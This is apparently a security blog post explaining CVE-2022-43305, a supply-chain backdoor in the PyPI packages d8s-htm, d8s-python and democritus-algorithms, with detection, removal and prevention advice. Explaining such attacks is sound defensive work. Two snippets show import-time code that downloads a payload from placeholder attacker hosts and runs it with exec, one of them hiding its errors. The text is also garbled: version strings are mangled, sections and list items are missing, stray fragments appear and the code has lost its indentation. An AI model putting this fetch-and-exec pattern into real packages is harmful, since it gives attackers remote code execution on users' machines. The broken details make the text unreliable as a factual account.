The Python Package Index (PyPI) is one of the main ways Python developers get third-party libraries to save time or add new features to their projects. However, if someone with bad intentions manages to sneak harmful code into a package, anyone installing it could be at risk. This happened with several Python packages, like d8s-python and democritus-algorithms, which were compromised and included code execution backdoors—specifically, in the package version d8s-htm .1..
In this post, we’ll break down what CVE-2022-43305 is, how the exploit works, and show actual code snippets from the affected packages. We'll also share original references and give tips on protecting yourself from similar attacks.
What Is CVE-2022-43305?
CVE-2022-43305 is a security vulnerability assigned to several packages, most notably d8s-python and its related submodules (like d8s-htm). Attackers managed to publish versions of these packages to PyPI with an embedded backdoor that could let them execute code on the machine of anyone who installed the package.
This backdoor means that if you pip install that package and import it—even unknowingly—it could let a hacker run any code they want on your system.
How Did the Backdoor Work?
The affected packages included a small piece of code, often hidden or obfuscated, that ran automatically when the package was imported. This code would contact an outside server (controlled by the attacker), download additional code or instructions, and run them on your machine.
Here’s a simplified example of what this kind of malicious code looks like
# Example snippet (similar to what appeared in d8s-htm .1.)
import urllib.request
def malicious():
url = 'http://malicious-server.com/cmd';
exec(urllib.request.urlopen(url).read())
malicious()
Whenever the package was installed or imported, this function would fire, contacting the attacker's server and running any code sent back. The dangerous part is that this happens without your knowledge or approval.
Sometimes the backdoor code would not appear right away, but be hidden in places like the setup.py, in __init__.py, or in obfuscated code that looked like data or configuration.
democritus-algorithms
If you installed any of these after fall 2022, you may be at risk.
You can check installed versions with
pip show d8s-htm d8s-python democritus-algorithms
Exploit Details
The exploit is what’s called a “supply chain attack.” Instead of hacking your code directly, attackers target the tools and packages everyone uses. Once the backdoor is in the package and uploaded to PyPI, anyone installing it is instantly exposed.
Execution: Whatever code the attacker wants is run on your machine.
Here’s a more detailed look at the structure of such a backdoor (from a real compromised PyPI package):
# In __init__.py or a helper module
try:
import urllib.request
payload_url = 'http://evil-domain.tld/payload';
exec(urllib.request.urlopen(payload_url).read().decode())
except Exception as e:
pass # Hide errors from triggering suspicion
The attacker can change the code on their server at any time! As long as someone imports the package, they have control.
pip uninstall d8s-htm d8s-python democritus-algorithms
`
- Check your projects and virtual environments for their presence.
- Consider rotating any credentials or secrets on systems where the packages were used.
- Stay up to date by watching security advisories on the PyPI blog and sources like GitHub Security Advisories and the Python Packaging Authority.
---
## Official References
- NIST CVE-2022-43305 Database Entry
- Sonatype Security Blog – More Malicious Packages on PyPI
- PyPI Security Disclosures
- BleepingComputer: PyPI package supply chain attacks
---
## How To Stay Safe from Similar Attacks
- Only install packages from trusted sources.
- Watch for new or unmaintained packages with few downloads.
- Check the code in any new package before using it, especially if you don’t recognize the author.
- Use security tools like Safety or Bandit to scan dependencies.
- Regularly check advisories and keep your dependencies up to date.
---
## In Summary
CVE-2022-43305 is a supply-chain vulnerability that highlights just how easily trust in software tools can be broken. The d8s-python and d8s-htm .1. packages exposed anyone installing them to remote code execution. Always stay cautious, and treat every dependency—no matter how small—as untrusted until proven safe.
If you were affected: Remove the packages, change credentials, watch your systems for suspicious activity, and keep up with security alerts. This is a reminder to always trust, but verify—especially with open-source software!
---
*Stay safe out there. If you have questions about specific packages or want to share your experience, drop a comment below.*
Timeline
Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 17:27:00 UTC